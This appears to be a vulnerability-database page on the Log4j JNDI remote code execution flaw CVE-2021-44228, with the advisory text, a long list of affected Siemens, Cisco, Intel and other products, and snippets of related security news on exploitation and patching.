Apache Log4j2 2.0-beta9 up to and including 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.
Vulnerable Product | Search on Vulmon | Subscribe to Product |
---|---|---|
apache log4j |
||
apache log4j 2.0 |
||
siemens sppa-t3000 ses3000 firmware |
||
siemens captial |
||
siemens captial 2019.1 |
||
siemens comos |
||
siemens desigo cc advanced reports 4.0 |
||
siemens desigo cc advanced reports 4.1 |
||
siemens desigo cc advanced reports 4.2 |
||
siemens desigo cc advanced reports 5.0 |
||
siemens desigo cc advanced reports 5.1 |
||
siemens desigo cc info center 5.0 |
||
siemens desigo cc info center 5.1 |
||
siemens e-car operation center |
||
siemens energy engage 3.1 |
||
siemens energyip 8.5 |
||
siemens energyip 8.6 |
||
siemens energyip 8.7 |
||
siemens energyip 9.0 |
||
siemens energyip prepay 3.7 |
||
siemens energyip prepay 3.8 |
||
siemens gma-manager |
||
siemens head-end system universal device integration system |
||
siemens industrial edge management |
||
siemens industrial edge management hub |
||
siemens logo! soft comfort |
||
siemens mendix |
||
siemens mindsphere |
||
siemens navigator |
||
siemens nx |
||
siemens opcenter intelligence |
||
siemens operation scheduler |
||
siemens sentron powermanager 4.1 |
||
siemens sentron powermanager 4.2 |
||
siemens siguard dsa 4.2 |
||
siemens siguard dsa 4.3 |
||
siemens siguard dsa 4.4 |
||
siemens sipass integrated 2.80 |
||
siemens sipass integrated 2.85 |
||
siemens siveillance command |
||
siemens siveillance control pro |
||
siemens siveillance identity 1.5 |
||
siemens siveillance identity 1.6 |
||
siemens siveillance vantage |
||
siemens siveillance viewpoint |
||
siemens solid edge cam pro |
||
siemens solid edge harness design |
||
siemens solid edge harness design 2020 |
||
siemens spectrum power 4 |
||
siemens spectrum power 4 4.70 |
||
siemens spectrum power 7 |
||
siemens spectrum power 7 2.30 |
||
siemens teamcenter |
||
siemens vesys |
||
siemens vesys 2019.1 |
||
siemens xpedition enterprise - |
||
siemens xpedition package integrator - |
||
intel audio development kit - |
||
intel computer vision annotation tool - |
||
intel data center manager |
||
intel genomics kernel library - |
||
intel oneapi sample browser - |
||
intel secure device onboard - |
||
intel sensor solution firmware development kit - |
||
intel system debugger - |
||
intel system studio - |
||
debian debian linux 9.0 |
||
debian debian linux 10.0 |
||
debian debian linux 11.0 |
||
fedoraproject fedora 34 |
||
fedoraproject fedora 35 |
||
sonicwall email security |
||
netapp active iq unified manager - |
||
netapp cloud insights - |
||
netapp cloud manager - |
||
netapp cloud secure agent - |
||
netapp oncommand insight - |
||
netapp ontap tools - |
||
netapp snapcenter - |
||
cisco advanced malware protection virtual private cloud appliance |
||
cisco automated subsea tuning |
||
cisco broadworks |
||
cisco business process automation |
||
cisco cloud connect |
||
cisco cloudcenter |
||
cisco cloudcenter cost optimizer |
||
cisco cloudcenter suite admin |
||
cisco cloudcenter workload manager |
||
cisco common services platform collector |
||
cisco connected mobile experiences - |
||
cisco contact center domain manager |
||
cisco contact center management portal |
||
cisco crosswork data gateway |
||
cisco crosswork data gateway 3.0.0 |
||
cisco crosswork network controller |
||
cisco crosswork network controller 3.0.0 |
||
cisco crosswork optimization engine |
||
cisco crosswork optimization engine 3.0.0 |
||
cisco crosswork platform infrastructure |
||
cisco crosswork platform infrastructure 4.1.0 |
||
cisco crosswork zero touch provisioning |
||
cisco crosswork zero touch provisioning 3.0.0 |
||
cisco customer experience cloud agent |
||
cisco cyber vision sensor management extension |
||
cisco data center network manager |
||
cisco data center network manager 11.3(1) |
||
cisco dna center |
||
cisco dna spaces connector |
||
cisco emergency responder |
||
cisco enterprise chat and email |
||
cisco evolved programmable network manager |
||
cisco finesse |
||
cisco finesse 12.6(1) |
||
cisco fog director - |
||
cisco identity services engine |
||
cisco identity services engine 2.4.0 |
||
cisco integrated management controller supervisor |
||
cisco intersight virtual appliance |
||
cisco iot operations dashboard - |
||
cisco network assurance engine |
||
cisco network services orchestrator |
||
cisco nexus dashboard |
||
cisco nexus insights |
||
cisco optical network controller |
||
cisco packaged contact center enterprise |
||
cisco packaged contact center enterprise 11.6(1) |
||
cisco paging server |
||
cisco prime service catalog |
||
cisco sd-wan vmanage |
||
cisco smart phy |
||
cisco ucs central |
||
cisco ucs director |
||
cisco unified communications manager |
||
cisco unified communications manager 11.5(1) |
||
cisco unified communications manager 11.5(1)su3 |
||
cisco unified communications manager im and presence service |
||
cisco unified communications manager im and presence service 11.5(1) |
||
cisco unified contact center enterprise |
||
cisco unified contact center enterprise 11.6(2) |
||
cisco unified contact center express |
||
cisco unified customer voice portal |
||
cisco unified customer voice portal 11.6 |
||
cisco unified customer voice portal 12.0 |
||
cisco unified customer voice portal 12.5 |
||
cisco unity connection |
||
cisco video surveillance operations manager |
||
cisco virtual topology system |
||
cisco virtualized infrastructure manager |
||
cisco virtualized voice browser |
||
cisco wan automation engine |
||
cisco webex meetings server |
||
cisco webex meetings server 3.0 |
||
cisco webex meetings server 4.0 |
||
cisco workload optimization manager |
||
cisco unified intelligence center |
||
cisco unified sip proxy |
||
cisco unified workforce optimization |
||
cisco fxos 6.2.3 |
||
cisco fxos 6.3.0 |
||
cisco fxos 6.4.0 |
||
cisco fxos 6.5.0 |
||
cisco fxos 6.6.0 |
||
cisco fxos 6.7.0 |
||
cisco fxos 7.0.0 |
||
cisco fxos 7.1.0 |
||
cisco automated subsea tuning 02.01.00 |
||
cisco broadworks - |
||
cisco cloudcenter suite 4.10(0.15) |
||
cisco cloudcenter suite 5.3(0) |
||
cisco cloudcenter suite 5.4(1) |
||
cisco cloudcenter suite 5.5(0) |
||
cisco cloudcenter suite 5.5(1) |
||
cisco common services platform collector 002.009(000.000) |
||
cisco common services platform collector 002.009(000.001) |
||
cisco common services platform collector 002.009(000.002) |
||
cisco common services platform collector 002.009(001.000) |
||
cisco common services platform collector 002.009(001.001) |
||
cisco common services platform collector 002.009(001.002) |
||
cisco common services platform collector 002.010(000.000) |
||
cisco connected analytics for network deployment 006.004.000.003 |
||
cisco connected analytics for network deployment 006.005.000. |
||
cisco connected analytics for network deployment 006.005.000.000 |
||
cisco connected analytics for network deployment 007.000.001 |
||
cisco connected analytics for network deployment 007.001.000 |
||
cisco connected analytics for network deployment 007.002.000 |
||
cisco connected analytics for network deployment 7.3 |
||
cisco connected analytics for network deployment 007.003.000 |
||
cisco connected analytics for network deployment 007.003.001.001 |
||
cisco connected analytics for network deployment 007.003.003 |
||
cisco connected analytics for network deployment 008.000.000 |
||
cisco connected analytics for network deployment 008.000.000.000.004 |
||
cisco crosswork network automation - |
||
cisco crosswork network automation 2.0.0 |
||
cisco crosswork network automation 3.0.0 |
||
cisco crosswork network automation 4.1.0 |
||
cisco crosswork network automation 4.1.1 |
||
cisco cx cloud agent 001.012 |
||
cisco cyber vision 4.0.2 |
||
cisco cyber vision sensor management extension 4.0.2 |
||
cisco dna center 2.2.2.8 |
||
cisco dna spaces - |
||
cisco dna spaces connector - |
||
cisco emergency responder 11.5 |
||
cisco emergency responder 11.5(4.65000.14) |
||
cisco emergency responder 11.5(4.66000.14) |
||
cisco enterprise chat and email 12.0(1) |
||
cisco enterprise chat and email 12.5(1) |
||
cisco enterprise chat and email 12.6(1) |
||
cisco evolved programmable network manager 3.0 |
||
cisco evolved programmable network manager 3.1 |
||
cisco evolved programmable network manager 4.0 |
||
cisco evolved programmable network manager 4.1 |
||
cisco evolved programmable network manager 5.0 |
||
cisco evolved programmable network manager 5.1 |
||
cisco finesse 12.5(1) |
||
cisco firepower threat defense 6.2.3 |
||
cisco firepower threat defense 6.3.0 |
||
cisco firepower threat defense 6.4.0 |
||
cisco firepower threat defense 6.5.0 |
||
cisco firepower threat defense 6.6.0 |
||
cisco firepower threat defense 6.7.0 |
||
cisco firepower threat defense 7.0.0 |
||
cisco firepower threat defense 7.1.0 |
||
cisco identity services engine 002.004(000.914) |
||
cisco identity services engine 002.006(000.156) |
||
cisco identity services engine 002.007(000.356) |
||
cisco identity services engine 003.000(000.458) |
||
cisco identity services engine 003.001(000.518) |
||
cisco identity services engine 003.002(000.116) |
||
cisco integrated management controller supervisor 002.003(002.000) |
||
cisco integrated management controller supervisor 2.3.2.0 |
||
cisco intersight virtual appliance 1.0.9-343 |
||
cisco mobility services engine - |
||
cisco network assurance engine 6.0(2.1912) |
||
cisco network dashboard fabric controller 11.0(1) |
||
cisco network dashboard fabric controller 11.1(1) |
||
cisco network dashboard fabric controller 11.2(1) |
||
cisco network dashboard fabric controller 11.3(1) |
||
cisco network dashboard fabric controller 11.4(1) |
||
cisco network dashboard fabric controller 11.5(1) |
||
cisco network dashboard fabric controller 11.5(2) |
||
cisco network dashboard fabric controller 11.5(3) |
||
cisco network insights for data center 6.0(2.1914) |
||
cisco network services orchestrator - |
||
cisco optical network controller 1.1 |
||
cisco paging server 8.3(1) |
||
cisco paging server 8.4(1) |
||
cisco paging server 8.5(1) |
||
cisco paging server 9.0(1) |
||
cisco paging server 9.0(2) |
||
cisco paging server 9.1(1) |
||
cisco paging server 12.5(2) |
||
cisco paging server 14.0(1) |
||
cisco prime service catalog 12.1 |
||
cisco sd-wan vmanage 20.3 |
||
cisco sd-wan vmanage 20.4 |
||
cisco sd-wan vmanage 20.5 |
||
cisco sd-wan vmanage 20.6 |
||
cisco sd-wan vmanage 20.6.1 |
||
cisco sd-wan vmanage 20.7 |
||
cisco sd-wan vmanage 20.8 |
||
cisco smart phy 3.1.2 |
||
cisco smart phy 3.1.3 |
||
cisco smart phy 3.1.4 |
||
cisco smart phy 3.1.5 |
||
cisco smart phy 3.2.1 |
||
cisco smart phy 21.3 |
||
cisco ucs central software 2.0 |
||
cisco ucs central software 2.0(1a) |
||
cisco ucs central software 2.0(1b) |
||
cisco ucs central software 2.0(1c) |
||
cisco ucs central software 2.0(1d) |
||
cisco ucs central software 2.0(1e) |
||
cisco ucs central software 2.0(1f) |
||
cisco ucs central software 2.0(1g) |
||
cisco ucs central software 2.0(1h) |
||
cisco ucs central software 2.0(1k) |
||
cisco ucs central software 2.0(1l) |
||
cisco unified communications manager 11.5(1.17900.52) |
||
cisco unified communications manager 11.5(1.18119.2) |
||
cisco unified communications manager 11.5(1.18900.97) |
||
cisco unified communications manager 11.5(1.21900.40) |
||
cisco unified communications manager 11.5(1.22900.28) |
||
cisco unified communications manager im & presence service 11.5(1) |
||
cisco unified communications manager im & presence service 11.5(1.22900.6) |
||
cisco unified computing system 006.008(001.000) |
||
cisco unified contact center enterprise 12.0(1) |
||
cisco unified contact center enterprise 12.5(1) |
||
cisco unified contact center enterprise 12.6(1) |
||
cisco unified contact center enterprise 12.6(2) |
||
cisco unified contact center express 12.5(1) |
||
cisco unified contact center express 12.6(1) |
||
cisco unified contact center express 12.6(2) |
||
cisco unified contact center management portal 12.6(1) |
||
cisco unified customer voice portal 11.6(1) |
||
cisco unified customer voice portal 12.0(1) |
||
cisco unified customer voice portal 12.5(1) |
||
cisco unified customer voice portal 12.6(1) |
||
cisco unified intelligence center 12.6(1) |
||
cisco unified intelligence center 12.6(2) |
||
cisco unified sip proxy 010.000(000) |
||
cisco unified sip proxy 010.000(001) |
||
cisco unified sip proxy 010.002(000) |
||
cisco unified sip proxy 010.002(001) |
||
cisco unified workforce optimization 11.5(1) |
||
cisco unity connection 11.5 |
||
cisco unity connection 11.5(1.10000.6) |
||
cisco video surveillance manager 7.14(1.26) |
||
cisco video surveillance manager 7.14(2.26) |
||
cisco video surveillance manager 7.14(3.025) |
||
cisco video surveillance manager 7.14(4.018) |
||
cisco virtual topology system 2.6.6 |
||
cisco wan automation engine 7.1.3 |
||
cisco wan automation engine 7.2.1 |
||
cisco wan automation engine 7.2.2 |
||
cisco wan automation engine 7.2.3 |
||
cisco wan automation engine 7.3 |
||
cisco wan automation engine 7.4 |
||
cisco wan automation engine 7.5 |
||
cisco wan automation engine 7.6 |
||
snowsoftware snow commander |
||
snowsoftware vm access proxy |
||
bentley synchro |
||
bentley synchro 4d |
||
percussion rhythmyx |
||
apple xcode |
Symantec data shows variation and scope of attacks.
Posted: 23 Dec, 20214 Min ReadThreat Intelligence SubscribeFollowtwitterlinkedinLog4j Vulnerabilities: Attack InsightsSymantec data shows variation and scope of attacks.Apache Log4j is a Java-based logging utility. The library’s main role is to log information related to security and performance to make error debugging easier and to enable applications to run smoothly. The library is part of the Apache Logging Services, a project of the A...
Symantec products will protect against attempted exploits of critical CVE-2021-44228 vulnerability
Posted: 11 Dec, 20211 Min ReadThreat Intelligence SubscribeFollowtwitterlinkedinApache Log4j Zero-Day Being Exploited in the WildSymantec products will protect against attempted exploits of critical CVE-2021-44228 vulnerability A zero-day vulnerability (CVE-2021-44228) has been discovered in Apache Log4j which, if exploited, could permit a remote attacker to execute arbitrary code on vulnerable systems. Exploit code for this vulnerability, ...
Posted: 13 Oct, 20225 Min ReadThreat Intelligence SubscribeFollowtwitterlinkedinBudworm: Espionage Group Returns to Targeting U.S. OrganizationsRecent attacks by group have spanned continents and include first confirmed attacks seen against the U.S. in a number of years.The Budworm espionage group has mounted attacks over the past six months against a number of strategically significant targets, including the government of a Middle Eastern country, a mul...
Latest tools, tactics, and procedures being used by the Hive, Conti, and AvosLocker ransomware operations.
Posted: 28 Apr, 20228 Min ReadThreat Intelligence SubscribeFollowtwitterlinkedinRansomware: How Attackers are Breaching Corporate NetworksLatest tools, tactics, and procedures being used by the Hive, Conti, and AvosLocker ransomware operations.Targeted ransomware attacks continue to be one of the most critical cyber risks facing organizations of all sizes. The tactics used by ransomware attackers are continually evolving, but by identifying the most freq...
Espionage group focuses on obtaining classified or sensitive intellectual property that has civilian and military applications.
Posted: 27 Apr, 20225 Min ReadThreat Intelligence SubscribeFollowtwitterlinkedinStonefly: North Korea-linked Spying Operation Continues to Hit High-value TargetsEspionage group focuses on obtaining classified or sensitive intellectual property that has civilian and military applications.The North Korean-linked Stonefly group is continuing to mount espionage attacks against highly specialized engineering companies with a likely goal of obtaining sensitive...
Symantec takes a look at the cyber security trends that shaped the year
Posted: 19 Jan, 20226 Min ReadThreat Intelligence SubscribeFollowtwitterlinkedinThe Threat Landscape in 2021Symantec takes a look at the cyber security trends that shaped the yearFrom the evolving ransomware ecosystem to attacks against critical infrastructure, Symantec looks back over the cyber-security trends that shaped 2021. A new whitepaper from Symantec, a division of Broadcom Software, takes a look back at the some of the major thre...
These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data. Quarterly figures According to Kaspersky Security Network, in Q3 2023: Kaspersky solutions blocked 694,400,301 attacks from online resources across the globe. A total of 169,194,807 unique links were recognized as malicious by Web Anti-Virus components. Attempts to run malware for stealing money from online bank accounts were stopped on the com...
IT threat evolution in Q2 2023 IT threat evolution in Q2 2023. Non-mobile statistics IT threat evolution in Q2 2023. Mobile statistics These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data. Quarterly figures According to Kaspersky Security Network, in Q2 2023: Kaspersky solutions blocked 801,934,281 attacks from online resources across the globe. A total of 209,716,810 unique links were detected by Web ...
IT threat evolution in Q1 2023 IT threat evolution in Q1 2023. Non-mobile statistics IT threat evolution in Q1 2023. Mobile statistics These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data. Quarterly figures According to Kaspersky Security Network, in Q1 2023: Kaspersky solutions blocked 865,071,227 attacks launched from online resources across the globe. Web Anti-Virus detected 246,912,694 unique URLs ...
IT threat evolution in Q3 2022 IT threat evolution in Q3 2022. Non-mobile statistics IT threat evolution in Q3 2022. Mobile statistics These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data. Quarterly figures According to Kaspersky Security Network, in Q3 2022: Kaspersky solutions blocked 956,074,958 attacks from online resources across the globe. Web Anti-Virus recognized 251,288,987...
IT threat evolution in Q2 2022 IT threat evolution in Q2 2022. Non-mobile statistics IT threat evolution in Q2 2022. Mobile statistics These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data. Quarterly figures According to Kaspersky Security Network, in Q2 2022: Kaspersky solutions blocked 1,164,544,060 attacks from online resources across the globe. Web Anti-Virus recognized 273,033,368 unique URLs as ma...
Get our weekly newsletter It's not as though folks haven't been warned about this
There have been millions of downloads of outdated, vulnerable Log4j versions despite the emergence of a serious security hole in December 2021, according to figures compiled by the firm that runs Apache Maven's Central Repository. That company, Sonatype, said it had seen four million downloads of exploitable Log4j versions from the repository alone between 10 December and the present day, out of a total of more than 10 million downloads over those past four weeks. Tracked as CVE-2021-44228 aka L...
Get our weekly newsletter Apply fixes responsibly in a timely manner or face the wrath of Lina Khan
The US Federal Trade Commission on Tuesday warned companies that vulnerable Log4j software needs to be patched … or else. In case any system administrators last month somehow missed the widespread alarm over vulnerabilities (CVE-2021-44228, CVE-2021-45046, CVE-2021-44832) in the Java logging package, the trade watchdog said Log4j continues to be exploited by a growing number of attackers and urged organizations to act now before it's too late. The FTC is advising companies to consult the US Cy...
Get our weekly newsletter Third major fix in ten days is an infinite recursion flaw rated 7.5/10
The Apache Software Foundation (ASF) has revealed a third bug in its Log4 Java-based open-source logging library Log4j. CVE-2021-45105 is a 7.5/10-rated infinite recursion bug that was present in Log4j2 versions 2.0-alpha1 through 2.16.0. The fix is version 2.17.0 of Log4j. That’s the third new version of the tool in the last ten days. In case you haven’t been paying attention, version 2.15.0 was created to fix CVE-2021-44228, the critical-rated and trivial-to-exploit remote code execution f...
Get our weekly newsletter Federal agencies have a week to get their systems patched
The US government's Cybersecurity and Infrastructure Security Agency (CISA) on Friday escalated its call to fix the Apache Log4j vulnerability with an emergency directive requiring federal agencies to take corrective action by 5 pm EST on December 23, 2021. Log4j is a Java-based open source logging library used in millions of applications. Versions up to and including 2.14.1 contain a critical remote code execution flaw (CVE-2021-44228), and the fix incorporated into version 2.15, released a wee...
Get our weekly newsletter Microsoft says cyber-spies linked to Beijing, Tehran are getting busy with security flaw along with world + dog Log4j doesn't just blow a hole in your servers, it's reopening that can of worms: Is Big Biz exploiting open source?
Microsoft reckons government cyber-spies in China, Iran, North Korea, and Turkey are actively exploiting the Log4j 2.x remote-code execution hole. Up until now, it was largely accepted that mere private miscreants, criminal gangs, and security researchers were mostly scanning the internet for systems and services vulnerable to CVE-2021-44228 in the open-source logging library widely used by Java applications. Network observers say they've seen tens of thousands of attempts per minute. Successful...
Get our weekly newsletter Now open-source logging library's JNDI disabled entirely by default, message lookups removed
Last week, version 2.15 of the widely used open-source logging library Log4j was released to tackle a critical security hole, dubbed Log4Shell, which could be trivially abused by miscreants to hijack servers and apps over the internet. However, that release only partially closed the hole (CVE-2021-44228) by disabling by default one aspect of the Java library's exploitable functionality – JNDI message lookups. Now version 2.16 is out, and it disables all of JNDI support by default, and removes ...
Get our weekly newsletter Private equity owners play pass the parcel
One of the biggest beasts in the password management world, LastPass, is being spun out from parent LogMeIn as a "standalone cloud security" organisation. "The success we've seen across the entire LogMeIn portfolio over the last 18 months proves there is a vast growth opportunity ahead for both LastPass and LogMeIn," said Andrew Kowal, a partner at Francisco Partners. Francisco Partners, a private equity business, bought the bundle of remote access, collab and password manager tools – which a...
Get our weekly newsletter Now open-source logging library's JNDI disabled entirely by default, message lookups removed
Last week, version 2.15 of the widely used open-source logging library Log4j was released to tackle a critical security hole, dubbed Log4Shell, which could be trivially abused by miscreants to hijack servers and apps over the internet. However, that release only partially closed the hole (CVE-2021-44228) by disabling by default one aspect of the Java library's exploitable functionality – JNDI message lookups. Now version 2.16 is out, and it disables all of JNDI support by default, and removes ...
Get our weekly newsletter This might be the bug that deserves the website, logo and book deal
Miscreants are wasting no time in using the widespread Log4j vulnerability to compromise systems, with waves and waves of live exploit attempts focused mainly – for now – on turning infected devices into cryptocurrency-mining botnet drones. Israel's Check Point said this morning it was seeing around 100 exploit attempts every minute, going into further detail in a blog post. Apache Log4j is an open-source logging utility written in Java that is used all over the world in many software packag...
Get our weekly newsletter Prepare to have a very busy weekend of mitigating and patching
An unauthenticated remote code execution vulnerability in Apache's Log4j Java-based logging tool is being actively exploited, researchers have warned after it was used to execute code on Minecraft servers. Infosec firm Randori summarised the vuln in a blog post, saying: "Effectively, any scenario that allows a remote connection to supply arbitrary data that is written to log files by an application utilizing the Log4j library is susceptible to exploitation." Crafted proof-of-concept code snippet...
Topics Security Off-Prem On-Prem Software Offbeat Special Features Vendor Voice Vendor Voice Resources As America, UK, Canada, Australia and friends share essential bible to detect and thwart infections
Seven nations today issued an alert, plus protection tips, about LockBit, the prolific ransomware-as-a-service gang. The group's affiliates remains a global scourge, costing US victims alone more than $90 million from roughly 1,700 attacks since 2020, we're told. The joint security advisory — issued by the US Cybersecurity and Infrastructure Security Agency (CISA), FBI, Multi-State Information Sharing and Analysis Center (MS-ISAC), and cybersecurity authorities in Australia, Canada, the UK, Ge...
Topics Security Off-Prem On-Prem Software Offbeat Special Features Vendor Voice Vendor Voice Resources Lax patching and vulnerable small biz kit make life easy for Beijing's secret-stealers
Law enforcement agencies from eight nations, led by Australia, have issued an advisory that details the tradecraft used by China-aligned threat actor APT40 – aka Kryptonite Panda, GINGHAM TYPHOON, Leviathan and Bronze Mohawk – and found it prioritizes developing exploits for newly found vulnerabilities and can target them within hours. The advisory describes APT40 as a "state-sponsored cyber group" and the People's Republic of China (PRC) as that sponsor. The agencies that authored the advis...
Get our weekly newsletter Plus: Ransomware gangster sentenced, Dell patches more Log4j bugs, and cartoon apes gone bad
In Brief Triton malware remains a threat to the global energy sector, according to an FBI warning. Triton is the software nasty used in a 2017 cyber attack carried out by a Russian government-backed research institution against a Middle East petrochemical facility. The new FBI warning [PDF] came a day after the US Department of Justice unsealed a pair of indictments that detail alleged Russian government efforts to use supply chain attacks and malware in an attempt to compromise and control crit...
Topics Security Off-Prem On-Prem Software Offbeat Vendor Voice Vendor Voice Resources Here’s how Wiz can help
Sponsored Feature When software vulnerabilities and zero days moved up the enterprise worry list 15 years ago, nobody imagined the world would one day end up with a threat as perplexing as Log4Shell – a vulnerability in the Apache Log4j open source logging framework that's used in software on all major operating systems spanning everything from cloud services to PC games. In what might be called the happier days of the past, flaws were something that affected single applications and individual...
Get our weekly newsletter Miscreants deployed cryptominers, backdoors since late December, Sophos says
VMware's Horizon virtualization platform has become an ongoing target of attackers exploiting the high-profile Log4j flaw to install backdoors and cryptomining malware. In a report this week, cybersecurity firm Sophos wrote that VMware's virtual desktop and applications platform has been in the crosshairs since late December, with the largest wave of attacks beginning Jan. 19 and continuing well into March. Many of the attacks are designed to deploy cryptocurrency mining malware, Sophos research...
Topics Security Off-Prem On-Prem Software Offbeat Special Features Vendor Voice Vendor Voice Resources Oracle and Apache holes also on Uncle Sam's list of big bad abused bugs
The US government's Cybersecurity and Infrastructure Security Agency (CISA) is adding three more flaws to its list of known-exploited vulnerabilities, including one involving TP-Link routers that is being targeted by the operators of the notorious Mirai botnet. The other two placed on the list this week involve versions of Oracle's WebLogic Server software and the Apache Foundation's Log4j Java logging library. The command-injection flaw in TP-Link's Archer AX21 Wi-Fi 6 routers – tracked as CV...
Topics Security Off-Prem On-Prem Software Offbeat Special Features Vendor Voice Vendor Voice Resources Latest offensive cyber group to switch to atypical programming for payloads
Research into Lazarus Group's attacks using Log4Shell has revealed novel malware strains written in an atypical programming language. DLang is among the newer breed of memory-safe languages being endorsed by Western security agencies over the past few years, the same type of language that cyber criminals are switching to. At least three new DLang-based malware strains have been used in attacks on worldwide organizations spanning the manufacturing, agriculture, and physical security industries, C...
Topics Security Off-Prem On-Prem Software Offbeat Vendor Voice Vendor Voice Resources Malicious cyber actors go after 2021's biggest misses, spend less time on the classics
Security flaws in Log4j, Microsoft Exchange, and Atlassian's workspace collaboration software were among the bugs most frequently exploited by "malicious cyber actors" in 2021 , according to a joint advisory by the Five Eyes nations' cybersecurity and law enforcement agencies. It's worth noting that 11 of the 15 flaws on the list were disclosed in 2021, as previous years' lists often found miscreants exploiting the older vulns for which patches had been available for years. Of course, the US Cyb...